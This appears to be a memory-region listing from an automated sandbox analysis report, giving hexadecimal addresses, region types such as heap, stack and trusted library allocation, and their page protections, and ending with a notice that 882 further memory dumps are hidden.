7FFD3462C000
trusted library allocation
page execute and read and write
569FE79000
stack
page read and write
7FFD347A0000
trusted library allocation
page read and write
25C12E5D000
heap
page read and write
7FFD3457D000
trusted library allocation
page execute and read and write
7FFD34570000
trusted library allocation
page read and write
7FFD347F0000
trusted library allocation
page read and write
25C12D30000
heap
page read and write
2492CF00000
trusted library allocation
page read and write
7FFD34860000
trusted library allocation
page read and write
7FFD3461C000
trusted library allocation
page execute and read and write
BC03A3E000
stack
page read and write
1DBE63C0000
heap
page read and write
25C2D03F000
heap
page read and write
7DF491660000
trusted library allocation
page execute and read and write
25A46980000
heap
page read and write
7FFD3455B000
trusted library allocation
page read and write
7FFD3457D000
trusted library allocation
page execute and read and write
7FFD34712000
trusted library allocation
page read and write
7DF479560000
trusted library allocation
page execute and read and write
9A0000
heap
page read and write
25C12D00000
heap
page read and write
25A49632000
trusted library allocation
page read and write
25A46B60000
heap
page read and write
1BDED000
stack
page read and write
2492CA98000
heap
page read and write
7FFD34780000
trusted library allocation
page read and write
25C149D0000
heap
page read and write
569FDFE000
stack
page read and write
7FFD34570000
trusted library allocation
page read and write
7FFD34542000
trusted library allocation
page read and write
25C12DD2000
heap
page read and write
7FFD347E0000
trusted library allocation
page read and write
1B3A0000
heap
page execute and read and write
9C0000
heap
page read and write
D95000
heap
page read and write
56A03FB000
stack
page read and write
11D0000
heap
page read and write
25A481D0000
trusted library allocation
page read and write
25A482C0000
heap
page read and write
7FFD34710000
trusted library allocation
page execute and read and write
56A00F8000
stack
page read and write
7FFD34583000
trusted library allocation
page read and write
7FFD34570000
trusted library allocation
page read and write
11E0000
trusted library allocation
page read and write
EF09283000
stack
page read and write
7FFD347B0000
trusted library allocation
page read and write
7FFD34750000
trusted library allocation
page read and write
7FFD34963000
trusted library allocation
page read and write
EF0A74E000
stack
page read and write
1DBCDD10000
heap
page read and write
1C323000
heap
page read and write
25A497B9000
trusted library allocation
page read and write
7FFD34594000
trusted library allocation
page read and write
EF09B7F000
stack
page read and write
1DBCC4C0000
heap
page readonly
249159A0000
trusted library allocation
page read and write
1DBCC230000
heap
page read and write
AF571B8000
stack
page read and write
7FFD34870000
trusted library allocation
page read and write
25A46780000
heap
page read and write
25A60AF4000
heap
page read and write
7FFD34840000
trusted library allocation
page read and write
56A0E4C000
stack
page read and write
7FFD347E0000
trusted library allocation
page read and write
25C249E1000
trusted library allocation
page read and write
7FFD34748000
trusted library allocation
page read and write
7FFD34880000
trusted library allocation
page read and write
7FFD349D0000
trusted library allocation
page read and write
2492CBB0000
heap
page execute and read and write
1DBCC480000
trusted library allocation
page read and write
1DBE651D000
heap
page read and write
25A49541000
trusted library allocation
page read and write
25A483D4000
heap
page read and write
25C24CCC000
trusted library allocation
page read and write
25A60A70000
heap
page read and write
1C9E0000
heap
page read and write
2492CA90000
heap
page read and write
24912C0B000
heap
page read and write
7FFD34724000
trusted library allocation
page read and write
7FFD34850000
trusted library allocation
page read and write
7FFD34800000
trusted library allocation
page read and write
1DBE6500000
heap
page read and write
1DBCC4A0000
trusted library allocation
page read and write
7FFD34950000
trusted library allocation
page read and write
1DBE6633000
heap
page read and write
56A027E000
stack
page read and write
7FFD34573000
trusted library allocation
page execute and read and write
7FFD349B0000
trusted library allocation
page read and write
25C15950000
trusted library allocation
page read and write
1DBCC313000
heap
page read and write
7FFD348B4000
trusted library allocation
page read and write
7FFD34820000
trusted library allocation
page read and write
1DBCF66B000
trusted library allocation
page read and write
7FFD348A0000
trusted library allocation
page read and write
7FFD34850000
trusted library allocation
page read and write
7FFD34790000
trusted library allocation
page read and write
24912C44000
heap
page read and write
25A48500000
heap
page execute and read and write
AF57F87000
stack
page read and write
EF09979000
stack
page read and write
D8F000
heap
page read and write
24912E15000
heap
page read and write
1DBE6700000
trusted library allocation
page read and write
569FEFE000
stack
page read and write
24915782000
trusted library allocation
page read and write
24915FB5000
trusted library allocation
page read and write
7FFD348D5000
trusted library allocation
page read and write
25C16801000
trusted library allocation
page read and write
2491534C000
trusted library allocation
page read and write
24915ECF000
trusted library allocation
page read and write
25A58801000
trusted library allocation
page read and write
24912B40000
heap
page read and write
7FFD34700000
trusted library allocation
page read and write
1DBDE0CC000
trusted library allocation
page read and write
7FFD345CC000
trusted library allocation
page execute and read and write
7FFD348A3000
trusted library allocation
page read and write
7FFD3456D000
trusted library allocation
page execute and read and write
7FFD348E0000
trusted library allocation
page read and write
1DBCC4E0000
heap
page read and write
25A60BBE000
heap
page read and write
25A58531000
trusted library allocation
page read and write
1DBCEB5D000
trusted library allocation
page read and write
7FFD347D0000
trusted library allocation
page read and write
25A587FB000
trusted library allocation
page read and write
1DBDDE11000
trusted library allocation
page read and write
7FFD348C9000
trusted library allocation
page read and write
25C14760000
heap
page readonly
2491656E000
trusted library allocation
page read and write
1DBCED58000
trusted library allocation
page read and write
7FFD34722000
trusted library allocation
page read and write
1DBCC460000
trusted library section
page read and write
25A60957000
heap
page execute and read and write
7FFD34573000
trusted library allocation
page execute and read and write
1DBCE2AD000
trusted library allocation
page read and write
25C12DAE000
heap
page read and write
2963000
heap
page read and write
7F0000
unkown
page readonly
7FFD34760000
trusted library allocation
page execute and read and write
56A0078000
stack
page read and write
25C2D131000
heap
page read and write
25C15A18000
trusted library allocation
page read and write
25C14A67000
trusted library allocation
page read and write
7FFD34616000
trusted library allocation
page read and write
24912B60000
trusted library section
page read and write
7FFD34996000
trusted library allocation
page read and write
56A02FE000
stack
page read and write
25C15BBF000
trusted library allocation
page read and write
BC03E3B000
stack
page read and write
2492CD22000
heap
page read and write
7FFD34728000
trusted library allocation
page read and write
7FFD34790000
trusted library allocation
page read and write
25C2CE15000
heap
page read and write
7FFD34990000
trusted library allocation
page read and write
25A608CE000
heap
page read and write
990000
heap
page read and write
1C1DE000
stack
page read and write
24924781000
trusted library allocation
page read and write
EF0930E000
stack
page read and write
7FFD34850000
trusted library allocation
page read and write
7FFD34580000
trusted library allocation
page read and write
25C2D200000
trusted library allocation
page read and write
AF5733E000
stack
page read and write
1DBCF6CE000
trusted library allocation
page read and write
7FFD34740000
trusted library allocation
page execute and read and write
2492CCF8000
heap
page read and write
D92000
heap
page read and write
7FFD349B0000
trusted library allocation
page read and write
25A608E3000
heap
page read and write
24912D30000
trusted library allocation
page read and write
7FFD34770000
trusted library allocation
page read and write
7FFD348D8000
trusted library allocation
page read and write
7FFD349B0000
trusted library allocation
page read and write
7FF4400C0000
trusted library allocation
page execute and read and write
249151A3000
trusted library allocation
page read and write
24912C09000
heap
page read and write
25C16162000
trusted library allocation
page read and write
24916529000
trusted library allocation
page read and write
25C12D70000
heap
page read and write
24924771000
trusted library allocation
page read and write
7FFD34800000
trusted library allocation
page read and write
25C15432000
trusted library allocation
page read and write
25A608E8000
heap
page read and write
7FFD34790000
trusted library allocation
page read and write
7FFD349A0000
trusted library allocation
page execute and read and write
25A49E6E000
trusted library allocation
page read and write
AF57E8C000
stack
page read and write
7FFD3496C000
trusted library allocation
page read and write
25A60BE7000
heap
page read and write
2492CCE4000
heap
page read and write
BC0377E000
stack
page read and write
25A49544000
trusted library allocation
page read and write
25A49D7A000
trusted library allocation
page read and write
7FFD34840000
trusted library allocation
page read and write
249247C3000
trusted library allocation
page read and write
25C12DBA000
heap
page read and write
7FFD34880000
trusted library allocation
page read and write
1DBCC4E5000
heap
page read and write
1DBCC2D4000
heap
page read and write
2492CF70000
heap
page read and write
7FFD348F0000
trusted library allocation
page read and write
7FFD3454D000
trusted library allocation
page execute and read and write
7FFD34800000
trusted library allocation
page read and write
CFC000
heap
page read and write
25A46B65000
heap
page read and write
25A60BA0000
heap
page read and write
7FFD34574000
trusted library allocation
page read and write
7FFD34820000
trusted library allocation
page read and write
7FFD347F0000
trusted library allocation
page read and write
1DBCFBB9000
trusted library allocation
page read and write
1DBCED47000
trusted library allocation
page read and write
25C12DBC000
heap
page read and write
BC039F9000
stack
page read and write
249155DD000
trusted library allocation
page read and write
7FFD34710000
trusted library allocation
page read and write
1DBE6515000
heap
page read and write
1DBE65E6000
heap
page read and write
7FFD348A8000
trusted library allocation
page read and write
25A60AC2000
heap
page read and write
25A48F63000
trusted library allocation
page read and write
7DF479550000
trusted library allocation
page execute and read and write
1DBCDD96000
heap
page execute and read and write
25C24CDA000
trusted library allocation
page read and write
1DBCED50000
trusted library allocation
page read and write
25A489DE000
trusted library allocation
page read and write
7FFD348AC000
trusted library allocation
page read and write
24924A5B000
trusted library allocation
page read and write
11F5000
heap
page read and write
1B4AE000
stack
page read and write
24912E10000
heap
page read and write
2491609C000
trusted library allocation
page read and write
EF0977E000
stack
page read and write
2491603E000
trusted library allocation
page read and write
7FFD34656000
trusted library allocation
page execute and read and write
7FFD34626000
trusted library allocation
page read and write
25A4A338000
trusted library allocation
page read and write
7FFD3459C000
trusted library allocation
page execute and read and write
290E000
stack
page read and write
1DBCE9E7000
trusted library allocation
page read and write
7FFD34880000
trusted library allocation
page read and write
7FFD348A0000
trusted library allocation
page read and write
11E3000
trusted library allocation
page read and write
7FFD349C0000
trusted library allocation
page read and write
7FFD3494C000
trusted library allocation
page read and write
25C2CEA0000
heap
page execute and read and write
25A60878000
heap
page read and write
25C2D061000
heap
page read and write
25A4966C000
trusted library allocation
page read and write
249159F7000
trusted library allocation
page read and write
7DF491650000
trusted library allocation
page execute and read and write
7FFD34572000
trusted library allocation
page read and write
25A6089B000
heap
page read and write
7FFD34770000
trusted library allocation
page read and write
7FFD34626000
trusted library allocation
page read and write
1DBCDE5B000
trusted library allocation
page read and write
7FFD34560000
trusted library allocation
page read and write
7FFD34758000
trusted library allocation
page read and write
2491654E000
trusted library allocation
page read and write
25C12D10000
heap
page read and write
7FFD349D0000
trusted library allocation
page read and write
7FFD34711000
trusted library allocation
page read and write
7FFD348C0000
trusted library allocation
page read and write
1DBCEFB8000
trusted library allocation
page read and write
AF56C72000
stack
page read and write
EF098F7000
stack
page read and write
7FFD34630000
trusted library allocation
page execute and read and write
7FFD34720000
trusted library allocation
page execute and read and write
25C1595D000
trusted library allocation
page read and write
24915871000
trusted library allocation
page read and write
2492CBB6000
heap
page execute and read and write
1DBCC298000
heap
page read and write
25A60B82000
heap
page read and write
25C12E69000
heap
page read and write
24915FDB000
trusted library allocation
page read and write
AF570BF000
stack
page read and write
BC04909000
stack
page read and write
25A60873000
heap
page read and write
25A49C94000
trusted library allocation
page read and write
7FFD34860000
trusted library allocation
page read and write
56A0F49000
stack
page read and write
EF0A9CE000
stack
page read and write
25A484E0000
heap
page execute and read and write
1CEBA000
stack
page read and write
25A60A60000
heap
page read and write
25C24A53000
trusted library allocation
page read and write
7FFD346E2000
trusted library allocation
page read and write
7FFD34930000
trusted library allocation
page read and write
25A481B0000
trusted library allocation
page read and write
AF56F79000
stack
page read and write
25C2CDC6000
heap
page read and write
25A498D6000
trusted library allocation
page read and write
BC03C3F000
stack
page read and write
25A4A2EE000
trusted library allocation
page read and write
2492CE78000
heap
page read and write
25A60BDE000
heap
page read and write
7FFD34730000
trusted library allocation
page execute and read and write
7FFD34870000
trusted library allocation
page read and write
BC03AB7000
stack
page read and write
BC03B37000
stack
page read and write
25C1594C000
trusted library allocation
page read and write
25A60940000
heap
page read and write
7FFD34580000
trusted library allocation
page read and write
7FFD3458B000
trusted library allocation
page read and write
25A589B9000
trusted library allocation
page read and write
7FFD348DA000
trusted library allocation
page read and write
1DBCC4D0000
trusted library allocation
page read and write
25C155F1000
trusted library allocation
page read and write
24915A59000
trusted library allocation
page read and write
There are 882 hidden memdumps, click here to show them.